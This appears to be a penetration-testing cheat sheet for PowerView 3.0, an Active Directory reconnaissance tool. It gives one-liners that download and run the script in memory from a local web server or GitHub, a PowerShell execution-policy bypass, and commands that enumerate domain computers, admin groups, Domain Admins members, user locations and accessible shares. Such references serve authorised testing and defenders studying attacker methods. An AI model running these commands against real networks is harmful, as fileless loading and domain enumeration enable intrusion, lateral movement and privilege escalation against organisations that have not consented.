PowerView 3.0


https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1
http://bit.ly/1pzQCnv

IEX (new-object net.webclient).downloadstring('http://192.168.0.11/powerview.ps1')
Import the powerview module without touching disk (from local webserver).

IEX (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')
Import the powerview module without touching disk (if connected to the internet).

powershell -exec bypass
import-module powerview.ps1
Import the powerview module from disk.

Get-DomainComputer | select Name
List all domain computers.

Get-NetGroup *admin* | select Name
List all domain groups with "admin" in name.

Get-DomainGroupMember -Identity "Domain Admins" -recurse | select MemberName
List all users in the "domain admin" group.

Find-DomainUserLocation -UserIdentity admin,administrator,etc...
Locate where users are on the domain.

Find-DomainUserLocation -ComputerName X,Y,etc...
Enumerate users on a host.

Find-GPOLocation -UserName X
Find where a specific user has administrative rights.

Find-DomainShare -ComputerName X -CheckShareAccess
Enumerate shares the current user has access to.
The "-ComputerName" flag can be left off to search all hosts in the domain.
The "-CheckShareAccess" flag can eb left off to search the host(s) for shares the user does not have access to.